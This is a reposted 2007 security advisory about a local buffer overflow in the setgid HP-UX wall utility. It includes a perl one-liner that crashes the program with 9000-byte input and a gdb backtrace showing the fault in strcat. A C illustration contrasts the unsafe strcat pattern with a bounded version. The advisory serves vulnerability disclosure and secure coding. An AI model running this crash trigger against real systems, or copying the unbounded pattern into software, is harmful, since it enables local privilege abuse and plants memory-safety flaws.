HPUX Wall Buffer Overflow

2007.10.21
Credit: Scotty
Risk: High
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Hi all,

After looking to check if this had been reported before I couldn't find anything, so here's my two cents:

HPUX /usr/sbin/wall Buffer Overflow.

    bash-2.04$ ls -las /usr/sbin/wall
    40 -r-xr-sr-x 1 bin tty 20480 Nov 7 1997 /usr/sbin/wall

Wall on HPUX works in the following way:

    echo "Something to Say" > file
    wall file

The problem arises when we place 9000 A's into the file to be broadcast by the wall program.

(Tested on HPUX 11.11)

    perl -e 'print "A" x 9000' > /tmp/out
    /usr/sbin/wall /tmp/out
    Memory fault

(Tested on HPUX 11.00)

    perl -e 'print "A" x 9000' > /tmp/out
    /usr/sbin/wall /tmp/out
    bash-2.04$ /usr/sbin/wall /tmp/out
    Segmentation fault

Looking at the registers, we can see:

    Program received signal SIGSEGV, Segmentation fault.
    0x7f779c08 in strcat () from /usr/lib/libc.2
    (gdb) bt
    7f779c08 in strcat () from /usr/lib/libc.2
    #1 0x34dc in ?? ()
    #2 0x34dc in ?? ()
    #3 0x34dc in ?? ()
    #4 0x34dc in ?? ()
    Error accessing memory address 0xffffffff: Bad address.

etc.. etc

The wall binary has Set Group ID of tty, so not a huge problem, but even so - still a security risk.

Regards,
uk2sec
Members; eip, c0w
uk2sec (at) oakey.no-ip (dot) com
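The backtrace in the post faults inside strcat(). As an added illustration (not part of the original post and not HP's source), the C below shows that class of bug beside a bounded form. The function names, MSG_MAX and the line-by-line read are assumptions, since the page does not show how wall builds its message.

```c
#include <stdio.h>
#include <string.h>

#define MSG_MAX 1024  /* assumed size: the page does not give wall's buffer size */

/* Hypothetical "before": append every line with strcat() and never compare the
 * running length with the destination size; MSG_MAX bytes or more overflow msg. */
void build_msg_unbounded(char *msg, FILE *fp)
{
    char line[256];
    msg[0] = '\0';
    while (fgets(line, sizeof line, fp) != NULL)
        strcat(msg, line);
}

/* "After": track the bytes used, copy no more than the room left, always
 * NUL-terminate. Returns 1 if input was truncated, 0 if it fit, -1 on bad cap. */
int build_msg_bounded(char *msg, size_t cap, FILE *fp)
{
    char line[256];
    size_t used = 0;
    if (cap == 0) return -1;
    msg[0] = '\0';
    while (fgets(line, sizeof line, fp) != NULL) {
        size_t n = strlen(line), room = cap - 1 - used;
        if (n > room) {               /* would overflow: keep what fits, stop */
            memcpy(msg + used, line, room);
            msg[used + room] = '\0';
            return 1;
        }
        memcpy(msg + used, line, n + 1);  /* n + 1 copies the terminator too */
        used += n;
    }
    return 0;
}

/* Constructed input: nbytes of 'A' in a temp file, like the post's /tmp/out.
 * Returns the stored message length, or -1 if the temp file cannot be made. */
long bounded_len_for(size_t nbytes, int *truncated)
{
    char msg[MSG_MAX];
    FILE *fp = tmpfile();
    if (fp == NULL) return -1;
    for (size_t i = 0; i < nbytes; i++) fputc('A', fp);
    rewind(fp);
    *truncated = build_msg_bounded(msg, sizeof msg, fp);
    fclose(fp);
    return (long)strlen(msg);
}
```

With the 9000-byte input from the post, the bounded version stores MSG_MAX - 1 bytes and reports truncation instead of writing past the buffer.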


Copyright 2024, cxsecurity.com

 
